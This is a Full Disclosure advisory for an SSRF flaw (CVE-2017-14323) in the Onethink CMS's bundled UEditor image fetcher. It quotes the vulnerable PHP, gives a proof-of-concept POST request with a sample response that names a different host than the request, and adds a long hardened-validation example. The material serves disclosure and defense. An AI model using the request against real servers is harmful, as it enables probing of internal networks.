Date: Wed, 4 Apr 2018 21:06:13 +0800
From: "service@...maohui.net" <service@...maohui.net>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)

# SSRF(Server Side Request Forgery) in Onethink  All version (CVE-2017-14323)

Onethink is an open source CMS (Content Management System) built on the ThinkPHP 3.2 development framework.

## Product Download: http://www.onethink.cn

## Vulnerability Type: SSRF (Server Side Request Forgery)

## Attack Type: Remote

## Vulnerability Description

Onethink bundles a flawed version of the UEditor editor, and that flaw is what introduces the SSRF vulnerability.

The vulnerable code (/Public/static/ueditor/php/getRemoteImage.php):

    $uri = htmlspecialchars( $_POST[ 'upfile' ] );
    $uri = str_replace( "&amp;" , "&" , $uri );
    getRemoteImage( $uri,$config );
    //echo($uri);

    /**
     * Remote fetch
     * @param $uri
     * @param $config
     */
    function getRemoteImage( $uri,$config)
    {
        // ignore the time limit while fetching
        set_time_limit( 0 );
        // ue_separate_ue is the separator UEditor uses to pass several values in one field
        $imgUrls = explode( "ue_separate_ue" , $uri );
        $tmpNames = array();
        foreach ( $imgUrls as $imgUrl ) {
            // check that the value starts with "http" (prefix check only, no scheme or host validation)
            if(strpos($imgUrl,"http")!==0){
                array_push( $tmpNames , "error" );
                continue;
            }
            //echo($imgUrl);
            // fetch the response headers
            $heads = get_headers( $imgUrl );   // This is a blind SSRF: a HEAD request is sent to the attacker-chosen URL
            // dead-link check
            if ( !( stristr( $heads[ 0 ] , "200" ) && stristr( $heads[ 0 ] , "OK" ) ) ) {
                array_push( $tmpNames , "error" );
                continue;
            }

            // format check (extension check and Content-Type check)
            // note: the extension is taken from the whole URL, so a query string or fragment ending in ".jpg" passes
            $fileType = strtolower( strrchr( $imgUrl , '.' ) );
            if ( !in_array( $fileType , $config[ 'allowFiles' ] ) || stristr( $heads[ 'Content-Type' ] , "image" ) ) {
                array_push( $tmpNames , "error" );
                continue;
            }
            //var_dump($tmpNames);

            // open the output buffer and fetch the remote image
            ob_start();
            $context = stream_context_create(
                array (
                    'http' => array (
                        'follow_location' => false // don't follow redirects
                    )
                )
            );
            // make sure the fopen wrappers are enabled in php.ini
            readfile( $imgUrl,false,$context);    // vulnerability is here: the server requests any http(s) URL and returns the body
            $img = ob_get_contents();
            ob_end_clean();

## Exploit

Request Content:

    POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
    Host: target
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 37
    Connection: keep-alive
    
    upfile=https://www.google.com/?%23.jpg

Response Content:

    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=utf-8
    Content-Length: 110

    {'url':'upload/43361505134158.jpg','tip':'远程图片抓取成功!','srcUrl':'http://www.baidu.com/?#.jpg'}

Modify the above upfile parameter, for example:

request over the http protocol: upfile=http://www.google.com

request over the https protocol: upfile=https://www.google.com

This vulnerability only uses the http and https protocols.

Triggering this vulnerability requires the allow_url_fopen option to be enabled in php.ini; allow_url_fopen is enabled by default.
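The checks in getRemoteImage() fail in three ways that the request above exploits: the "http" prefix test is not a scheme check, the extension is read from the end of the whole URL (so `?#.jpg` satisfies it), and nothing restricts which host the server will contact. The following is an added example of a hardened replacement for that validation, written for this advisory and not code from Onethink or UEditor. The function names (validateRemoteImageUrl, fetchRemoteImage, isPublicIp), the $allowFiles list and the fake resolver used in the demonstration are assumptions chosen for the example; it generalises the advisory's single `?%23.jpg` case to any query, fragment or private-address bypass.

```php
<?php
// Added example: hardened URL validation and fetch for a "remote image" feature.
// Not Onethink/UEditor code; names below are assumptions for this example.

const ALLOWED_SCHEMES = ['http', 'https'];

/** True if $ip is a public unicast address (not loopback, RFC 1918, link-local or reserved). */
function isPublicIp(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/**
 * Validate a user-supplied image URL. Returns [true, $ip] with the address that
 * should be contacted, or [false, $reason]. $resolve lets callers pin a resolver
 * (the demo below uses an offline map instead of real DNS).
 */
function validateRemoteImageUrl(string $uri, array $allowFiles, callable $resolve = 'gethostbyname'): array
{
    $parts = parse_url($uri);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return [false, 'unparseable URL'];
    }
    // 1. Real scheme allowlist: strpos($uri, "http") === 0 also accepts e.g. "httpx://".
    if (!in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true)) {
        return [false, 'scheme not allowed'];
    }
    // 2. Credentials in the URL are never legitimate for an image fetch.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return [false, 'userinfo not allowed'];
    }
    // 3. Extension check on the path component only. strrchr($uri, '.') scans the
    //    whole URL, so "?#.jpg" or "?x=.jpg" passes there but not here.
    $ext = strtolower('.' . pathinfo($parts['path'] ?? '', PATHINFO_EXTENSION));
    if ($ext === '.' || !in_array($ext, $allowFiles, true)) {
        return [false, 'extension not allowed'];
    }
    // 4. Resolve the host and refuse non-public targets (127.0.0.1, 10/8, 192.168/16,
    //    169.254.169.254 cloud metadata, ...). IPv6 literals arrive bracketed.
    $host = trim($parts['host'], '[]');
    $ip = filter_var($host, FILTER_VALIDATE_IP) !== false ? $host : $resolve($host);
    if (!isPublicIp($ip)) {
        return [false, "host resolves to non-public address $ip"];
    }
    return [true, $ip];
}

/** Fetch the validated URL from the address we checked, with redirects off and a size cap. */
function fetchRemoteImage(string $uri, string $ip, int $maxBytes = 5 * 1024 * 1024): ?string
{
    $parts = parse_url($uri);
    $port  = $parts['port'] ?? (strtolower($parts['scheme']) === 'https' ? 443 : 80);
    $ch = curl_init($uri);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                   // a redirect could point at an internal host
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$parts['host']}:$port:$ip"], // pin the checked IP (DNS rebinding)
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_MAXFILESIZE    => $maxBytes,
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $ctype  = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    curl_close($ch);
    // Unlike the original (which accepted anything *not* containing "image"), require an image type.
    if ($body === false || $status !== 200 || stripos($ctype, 'image/') !== 0) {
        return null;
    }
    return $body;
}

// Demonstration with constructed inputs and an offline resolver map (no real DNS needed).
$allowFiles = ['.jpg', '.jpeg', '.png', '.gif'];
$fakeDns = ['www.google.com' => '142.250.0.1', 'img.example.test' => '203.0.113.10', 'intranet' => '10.0.0.5'];
$resolver = fn(string $h): string => $fakeDns[$h] ?? $h;   // unknown host: returned unchanged, fails isPublicIp()
$samples = [
    'https://www.google.com/?%23.jpg',                     // the advisory's PoC (fragment after decoding)
    'https://www.google.com/?#.jpg',                       // same, already decoded
    'http://127.0.0.1:8080/admin/status.jpg',              // loopback
    'http://169.254.169.254/latest/meta-data/x.jpg',       // link-local metadata service
    'http://intranet/report.png',                          // resolves to RFC 1918 space
    'ftp://img.example.test/a.jpg',                        // wrong scheme
    'https://img.example.test/images/logo.png',            // the only one that may be fetched
];
foreach ($samples as $s) {
    [$ok, $info] = validateRemoteImageUrl($s, $allowFiles, $resolver);
    printf("%-48s %s\n", $s, $ok ? "ok, fetch from $info" : "rejected: $info");
}
```

Of the seven sample URLs only the last is accepted; the first two fail because the path is `/` and the `.jpg` sits in the query or fragment. The resolver is injected so the demonstration runs without network access; in production leave the default gethostbyname and keep the CURLOPT_RESOLVE pin in fetchRemoteImage, otherwise a host that changes its A record between the check and the fetch (DNS rebinding) defeats step 4. The Content-Type test is also inverted relative to the original, which as written rejects only responses whose type contains "image".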

## Versions

Onethink, all versions

## Impact

SSRF (Server Side Request Forgery) in Onethink V1.0 and V1.1 allows remote attackers to perform information detection and attacks against internal network servers.

## Credit

This vulnerability was discovered by Qian Wu, Bo Wang, Jiawang Zhang and the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC).

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14323



service@...maohui.net